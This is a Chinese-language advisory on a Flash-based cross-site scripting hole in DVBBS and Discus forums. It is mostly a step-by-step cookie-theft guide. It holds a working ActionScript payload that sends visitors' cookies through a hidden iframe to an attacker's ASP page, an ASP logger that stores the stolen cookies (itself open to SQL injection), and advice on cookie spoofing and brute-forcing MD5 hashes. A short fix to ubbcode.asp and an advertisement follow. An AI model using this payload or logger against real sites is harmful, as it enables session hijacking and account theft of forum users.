◇ 此漏洞所涉及版本：:
DVBBS、Discus所有版本，其它論壇未作測試，相信大多數都存在該漏洞


◇ 描述：
由于DVBBS等論壇對Flash采取直接播放形式，導致攻擊者可以利用Flash嵌入一段javascript代碼，達到偷取用戶Cookies的目的


◇ 具體分析與利用：
1. 首先準備好一個可以運行ASP的空間，用來存放Cookies
2. 新建一個Flash動畫，加入如下代碼：
onClipEvent (load) {
url="javascript:var rng=document.selection.createRange();rng.pasteHTML(\"<iframe name=frame_hide style='display:none'></iframe><img src=\\\"./images/logo.gif\\\" style=\\\"display:none\\\" onload=\\\"javascript:co=document.cookie;document.all.frame_hide.src='http://存放路徑/WriteCookies.asp?Cookies='+co.split('&');var e=document.all;for(var i=0;i<e.length;i++){if(e(i).tagName=='A'){var ss=e(i).outerHTML;}}\\\">\");"
getURL(url);
}
利用iframe是為了讓其它人查覺不到程序的頁面跳轉
3. 將Flash導出為swf文件，插入到想要偷取Cookies的論壇上，加入代碼http://Flash地址 （注，有些論壇是[swf][/swf]）
4. 這樣，如果有用戶進到貼子里面，javascript程序就會把該用戶的Cookies送到WriteCookies.asp，保存到數據庫
5. 至于Cookies欺騙，推薦使用IECookiesView，很多教程都有介紹，在這里就不多說了


◇ 備注
1. 對于禁用Flash的論壇，還可以利用PNG格式的圖片嵌入代碼偷取
2. 拿到Cookies后，密碼是經MD5算法加密過的字符串，如果你喜歡用暴力的話，可以試試去解碼，當然，個人是不推薦這種方法的


◇ 解決方案：
1. 禁用Flash，或將Flash改為鏈接格式，以動網為例，修改INC/ubbcode.asp文件

找到下面兩段
re.Pattern="(\[FLASH\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$2"" TARGET=_blank><IMG SRC=http://www.okasp.com/techinfo/pic/swf.gif border=0 alt=點擊開新窗口欣賞該FLASH動畫! height=16 width=16>[全屏欣賞]</a>
<OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=500 height=400><PARAM NAME=movie value=""$2""><PARAM NAME=quality value=high><embed src=""$2"" quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' type='application/x-shockwave-flash' width=500 height=400>$2</embed></OBJECT>")

re.Pattern="(\[FLASH=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$4"" TARGET=_blank><IMG SRC=http://www.okasp.com/techinfo/pic/swf.gif border=0 alt=點擊開新窗口欣賞該FLASH動畫! height=16 width=16>[全屏欣賞]</a>
<OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=$2 height=$3><PARAM NAME=movie value=""$4""><PARAM NAME=quality value=high><embed src=""$4"" quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' type='application/x-shockwave-flash' width=$2 height=$3>$4</embed></OBJECT>")

改為
re.Pattern="(\[FLASH\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$2"" TARGET=_blank><IMG SRC=http://www.okasp.com/techinfo/pic/swf.gif border=0 height=16 width=16>[點擊打開該Flash文件]</a>")

re.Pattern="(\[FLASH=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/FLASH\])"
strContent= re.Replace(strContent,"<a href=""$4"" TARGET=_blank><IMG SRC=http://www.okasp.com/techinfo/pic/swf.gif border=0 height=16 width=16>[點擊打開該Flash文件]</a>")


2. 至于PNG圖片的問題，留給寫論壇的人自己去解決吧


◇ 附：保存Cookies的簡單ASP代碼，如果想要加上其他功能，自己稍為修改一下就行了。
Set conn=Server.CreateObject("ADODB.Connection")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq="& Server.MapPath("CookiesLog.mdb")
Cookies=request("Cookies")
IP=request.serverVariables("remote_host")
sql="insert into co(Cookies,IP) values('"&Cookies&"','"&IP&"')"
conn.execute(sql)
set conn=nothing


◇ 廣告時間：
本漏洞由“灌水公司”全體工作人員發現，Flash代碼由余平編寫，文檔由小竹整理。
灌水公司提供專業級的網站程序開發，數據庫開發，收費技術支持、安全顧問服務

聯系方式：
QQ：48814 （小竹）
QQ組：1019634 （灌水公司）